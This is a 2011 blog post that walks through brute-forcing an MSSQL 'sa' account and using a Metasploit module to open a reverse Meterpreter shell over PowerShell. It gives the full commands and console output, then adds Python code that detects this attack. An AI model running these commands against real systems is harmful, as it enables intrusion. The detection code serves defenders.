
Monday, May 16, 2011

Attacking Windows Operating System Over PowerShell | Done Using Metasploit.


You may already know the PowerShell execution policies and the protection measures Microsoft built around them. As a reminder, there are four execution-policy levels that help control which scripts are allowed to run.
That earlier post focused mostly on the benefit to system security administrators, but what about attackers? Does PowerShell also benefit an attacker trying to compromise a remote system? Can an attacker bypass the existing execution policies to run malicious scripts?
At DEF CON 18 there was an interesting presentation called "PowerShell ...omfg" by David Kennedy (ReL1K) and Josh Kelley (Winfang). The demo showed how Windows PowerShell lets users perform almost any task they want, and a new attack vector through PowerShell was released that lets an attacker deliver any payload through PowerShell, in both bind and reverse scenarios, and drop any executable.
On a penetration testing engagement you start by running nmap to find the live Windows hosts on the network, essentially those with port 1433 (MSSQL) open. You then launch a brute-force attack against the "sa" account, which is the system administrator account for MSSQL. When "Mixed Mode" (SQL Authentication) is in use, the "sa" account is created automatically; administrators have to enter a password when creating it and often leave that password weak.
Then open Metasploit with the latest update, which includes the Metasploit PowerShell Debug.

$ msfconsole
msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > show payloads
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(mssql_payload) > set LHOST [Your IP]
msf exploit(mssql_payload) > set RHOST [TARGET IP]
msf exploit(mssql_payload) > set UsePowershell true
msf exploit(mssql_payload) > set UseCmdStager false
msf exploit(mssql_payload) > exploit
(Setting UsePowershell to true makes the module use PowerShell for the payload conversion on Server 2008 and Windows 7.)
On the console Metasploit will display the following:
[*] Started bind handler.
[*] Warning: This module will leave gjMKcfst.exe in the SQL Server %TEMP% directory
[*] Uploading the payload utilizing PowerShell EncodedCommand…
[*] Executing the payload…
[*] Sending stage (748032 bytes) to [TARGET IP]
[*] Be sure to cleanup gjMKcfst.exe…
[*] Meterpreter session 1 opened (10.X.X.X:4444 -> 10.X.X.X:1030)
meterpreter >
The demonstrated attack works on Windows 2008 R2, Windows 7, or any Windows operating system that has PowerShell installed. A penetration tester can bypass all the restriction policies on Windows and execute the payload on the system to get a Meterpreter shell. It is clear that relying solely on the execution policy is not a good solution, since a malicious user can bypass all of PowerShell's security measures this way. Note that the module itself warns that it leaves the dropped executable in the SQL Server's %TEMP% directory, and that the payload is passed through PowerShell's EncodedCommand option; both are artifacts a defender can look for on the host.
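As an added defender-side example (not from the original post, and not Metasploit's code), the following Python triages process-creation events for the pattern this module produces: powershell.exe launched with -EncodedCommand from under sqlservr.exe, with a decoded script that drops and runs an executable in %TEMP%. The event format, the indicator names and the assumption that xp_cmdshell children run under sqlservr.exe are mine; the sample events are constructed inside the block and reuse the file name from the console output above.

```python
import base64
import re

# Decoded-script patterns matching what the module above does (drop an .exe in %TEMP%, run it).
INDICATORS = {
    "exe_in_temp": re.compile(r"(\$env:temp|%temp%|\\temp\\)[^\n]*\.exe", re.I),
    "writes_bytes": re.compile(r"WriteAllBytes|Set-Content[^\n]*-Encoding\s+Byte", re.I),
    "launches_process": re.compile(r"Start-Process|Invoke-Expression|\biex\b", re.I),
}

def decode_encoded_command(cmdline):
    """Return the script carried by -EncodedCommand (or a prefix like -e, -enc), else None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        switch = tok.lstrip("-/").lower()
        if switch and "encodedcommand".startswith(switch):
            try:  # PowerShell expects base64 of the UTF-16LE script text
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

def triage(event):
    """Score one process-creation event: dict with 'ancestors' (list), 'image', 'cmdline'."""
    if not event["image"].lower().endswith("powershell.exe"):
        return "none", []
    script = decode_encoded_command(event["cmdline"])
    if script is None:
        return "none", []
    findings = ["encoded_command"] + [name for name, rx in INDICATORS.items() if rx.search(script)]
    # Assumption: xp_cmdshell spawns its children under sqlservr.exe (via cmd.exe); flag that ancestry.
    if any(p.lower() == "sqlservr.exe" for p in event["ancestors"]):
        findings.append("spawned_by_sql_server")
    severity = "high" if len(findings) >= 3 else "medium" if len(findings) == 2 else "low"
    return severity, findings

def _enc(script):  # builds a -EncodedCommand argument; used only to construct the samples below
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed, not real logs; the first mimics the module's behaviour above
    {"ancestors": ["sqlservr.exe", "cmd.exe"], "image": PS, "cmdline": "powershell.exe -EncodedCommand "
     + _enc("[IO.File]::WriteAllBytes($env:TEMP + '\\gjMKcfst.exe', $b); Start-Process ($env:TEMP + '\\gjMKcfst.exe')")},
    {"ancestors": ["explorer.exe"], "image": PS, "cmdline": "powershell.exe -NoProfile -enc "
     + _enc("Get-Service | Where-Object Status -eq 'Running'")},
    {"ancestors": ["services.exe"], "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
]

for ev in SAMPLE_EVENTS:
    print(ev["image"].rsplit("\\", 1)[-1], *triage(ev))
```

Plain `-EncodedCommand` use by administrators is common, so only the combination of indicators (SQL Server ancestry plus a dropped executable) is treated as high severity.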